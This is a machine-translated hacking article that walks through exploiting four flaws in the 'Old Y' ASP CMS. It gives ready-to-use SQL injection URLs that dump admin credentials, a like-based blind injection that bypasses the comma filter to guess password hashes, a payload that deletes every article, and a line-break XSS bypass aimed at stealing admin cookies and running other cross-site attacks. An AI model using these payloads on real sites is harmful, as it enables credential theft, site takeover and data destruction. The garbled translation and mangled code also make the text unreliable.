Author: Cschii Excerpt from: Anti-DDoS pro
[Keyword]: CheckStr () function, LoseHtml () function, bypassing commas, wildcards, line breaks, alternative manual injection, cross-site
[Technical points]:
1. The latest four vulnerabilities of old Y are revealed;
2. Use the regular expression "(<. +?> )" "." Indicates "matching any character other than linefeed". Insert "linefeed" in the tag of the Html statement to filter the regular expression;
3. bypass the comma and use manual injection instead. The CheckStr () function filters out commas. Therefore, you cannot use a multi-parameter function. For example, the string truncation function mid () cannot use the union statement, because the union statement must ensure that the number of fields is consistent, you cannot use symbols such as "<", ">", and "=". Therefore, you can use the select like statement to guess the characters matching the MD5 code of the password. Valid values: 0-9, A-F (not distinguished by size );
4. A code for converting strings and Unicode characters is provided;
[Main content]:
Old Y uses pseudo static pages (by/Html/Index. asp call), the code is quite concise, and the filtering is also very strict, the number type uses LaoYRequest (), the encoding type uses CheckStr () and other functions for filtering to prevent injection, the text content uses LoseHtml () function filtering prevents cross-site scripting. It provides comprehensive functions, including news stamp, announcements, messages, comments, RSS, user registration, website style, simplified and Traditional Chinese options, and fewer dynamic page files.
However, the wise may have to worry about it. This article comprehensively analyzes old Y, and we once again feel that security must be strictly filtered! The CheckStr () function of old Y escaped a fatal flaw because it filtered out commas, but neglected brackets, which allowed us to skillfully construct SQL statements for injection purposes. This article involves an alternative manual injection method, that is, bypassing functions such as mid and using the like keyword to guess characters, injection vulnerability 2 will completely destroy old Y-delete all articles, leave only the "body"-the website framework. Because the LoseHtml () function of old Y has a defect when using regular expressions, we can use the line break Insertion Method to submit cross-site scripts. Comments across sites will also affect the homepage of the website! If you submit scripts such as page Jump, close, and endless loop, you can perform DDOS attacks. You can also obtain administrator cookies, webpage Trojans, spread worms, and other cross-site attacks. All of this is caused by insufficient filtering by the old Y function! Finally, we would like to remind you that you must modify the table name and background management directory of the administrator user when using old Y.
Vulnerability 1: js. asp page vulnerability. This vulnerability was discovered by magic spring (bl4ck. When processing characters filtered by the CheckStr () function on the js. asp page, the "|" Delimiter is restored to "," (that is, a comma), resulting in injection.
Exploitation link:
Code:
Http: // 127.0.0.1/laoy/js. asp? Maxlen = 50 & num = 5 & ClassNo = 1 | 1 | 1) % 09 Union % 09 Select % 091 | cstr (id) % 2 Bchr (58) % 2Badmin_name % 2 Bchr (58) % 2Badmin_pass | 3 | 4 | 5 | 6 | 7 | 8 | 9% 09 From % 09yao_admin % 09 Where % 09 (1
// The maxlen and num parameters must be specified.
// The cstr () function converts the value of the numeric field id into a string,
// % 2B that is, "+" is used as the connection id, admin_name, and admin_pass Fields
// Chr (58) that is, ":" Is the delimiter.
Note: There are differences between the background authentication methods of versions 2.3 and 2.4: the former Administrator Password uses a 16-bit MD5 code, and the login authentication uses Session; the latter administrator uses the intercepted 18-bit MD5 code (adminpwd = Mid (md5 (adminpwd, 32),) to log on to the system and use cookies for authentication. Puzzling changes: Although Session 2.3 cannot be forged, the 16-bit MD5 code can be used online or cracked, although the 18-bit MD5 code intercepted in version 2.4 cannot be cracked (unless you write your own brute-force tool), you can perform Cookie spoofing! This is more convenient than cracking the MD5 code.
Vulnerability 2: User/UserAdd. asp page vulnerability. Because in User/UserAdd. on the asp page, the edit () and saveedit () Modules use the CheckStr () function to filter the ID of the numeric variable, resulting in manual injection to obtain the administrator password, del (), delAll () the module does not filter the variable ID, so that you can delete the article at will. This vulnerability can be exploited only after logging on to the user.
Exploitation of edit () module vulnerabilities:
Modify any article. It is not difficult to see from the code that if the id is "168 OR 1" to ensure that the SQL statement returns a non-empty set, the article editing interface with id 168 will be opened, and the saveedit () this vulnerability also exists in the module, so that we can modify any article. Note that the edited article will become unreviewed. Of course, if you can modify any article, the exploitation value of this vulnerability is not very high, so let's continue to explore it.
Inject the administrator password. Through the previous introduction, we know that Version 2.3 does not filter commas, so it is relatively easy to construct the union statement. version 2.4 filters out commas and requires some tips. So here we will introduce them separately.
Attackers can bypass commas and inject them manually. The CheckStr () function filters out commas. Therefore, you cannot use a multi-parameter function. For example, the string truncation function mid () cannot use the union statement, because the union statement must ensure that the number of fields is consistent, we cannot use symbols such as <,>, and =, which poses a challenge for manual injection. Therefore, considering the use of the select like statement, the basic syntax is as follows:
Code:
Select * from yao_admin where admin_pass like 1 *
Select * from yao_admin where admin_pass like 1 ?????????????????
// Because the length of admin_pass is 18, "1" and 17 "?" are used. If the first character of the password is "1", the Select statement returns; otherwise, no. This is the same as the IIF function.
Because the CheckStr () function filters Single and Double quotation marks, subqueries are introduced to obtain derived statements:
Code:
Select top 1 * from yao_admin where admin_pass like (Select chr (49) + chr (42) from yao_admin)
// Chr (49) is the number 1, chr (42) is the character "*", and chr (63) is the character "?"
Modify "*" to a self-added Article ID, such as 185. You can first "post a new article" to obtain the ID of the article. The URL used is provided as follows:
Code:
Http: // 127.0.0.1/laoy/User/UserAdd. asp? Action = edit & id = (Select % 09top % 091% 09185% 09 From % 09yao_admin % 09 Where % 09admin_pass % 09 Like % 09 (Select % 09chr (49) % 2 Bchr (37) % 09 From % 09yao_admin ))
// The wildcard "*" and "?" In the ACCESS query interface If the jet SQL statement used for execution using ADO should be "%", "_", and chr (37) should be the character "%"
Note: The wildcards "*" and "?" In the ACCESS query interface If it is used in the jet SQL statement executed using ADO, it should be "%", "_", etc, that is, the ansi SQL wildcard "%" and "_" are valid only in Microsoft Jet 4.X and Microsoft OLE DB Provider for Jet. If they are used in Microsoft Access or DAO, they are considered as text. Therefore, in the URL given for exploitation, replace chr (42) in the derivative statement with "*" with chr (37) or "% ".
After accessing the URL, the system prompts "this is not good !", 8, indicating that the 1st characters in the admin_pass password are not chr (49), that is, the number "1", and is changed to chr (50 )~ Chr (57), chr (65 )~ Chr (70), corresponding to the number 2 ~ 9. Letter ~ F (like statement is case-insensitive). If the article editing page with the ID of 185 is opened normally, the 1st-bit admin_pass password can be determined, then you can guess 2nd, 3, and so on ...... 18 characters.
Del () Module Vulnerability exploitation. The id variable is not filtered. If the id is set to "1 or 1", all articles on the website will be deleted! The harm should be very serious.
The usage of "or 1" in this article is different from that of "or 1 = 1", because the CheckStr () of old Y () the function filters the "<", ">", and "=" symbols, so we use the "numbers 1 and 0 can represent logical true and false" features to construct SQL statements.
Vulnerability 3: Comment across sites. Old Y uses the ChkBadWords () and GlHtml () functions to filter the Html tags, single and double quotation marks when outputting memContent, that is, the comments. Therefore, it cannot be used across sites, however, we can use the non-filtered memAuthor for Cross-Site purposes. At the bottom of the page for browsing the article, the "big name" (memAuthor) is a single row input column and cannot be modified. We must modify the submit page as follows. Note that the Author input column is changed to the textarea element, you can enter multiple rows (that is, you can insert line breaks). Modify the form action value and ArticleID value based on the actual situation and set "" to a line break.
The LoseHtml () function code is as follows:
Code:
Function LoseHtml (ContentStr)
Dim ClsTempLoseStr, regEx
ClsTempLoseStr = Cstr (ContentStr)
Set regEx = New RegExp
RegEx. Pattern = "(<. +?>) "
RegEx. IgnoreCase = True
RegEx. Global = True
ClsTempLoseStr = regEx. Replace (ClsTempLoseStr ,"")
// The meaning of this paragraph is: Replace "<" and ">" and all characters between them are blank
RegEx. Pattern = "(&. + ?;) "
ClsTempLoseStr = RegEx. Replace (ClsTempLoseStr ,"")
ClsTempLoseStr = Replace (ClsTempLoseStr, VbCrlf ,"")
ClsTempLoseStr = Replace (ClsTempLoseStr, VbCr ,"")
ClsTempLoseStr = Replace (ClsTempLoseStr, VbLf ,"")
// Replace the carriage return and line break with null.
...... (Omitted) // filter single, double quotation marks, spaces, etc.
LoseHtml = ClsTempLoseStr
End fun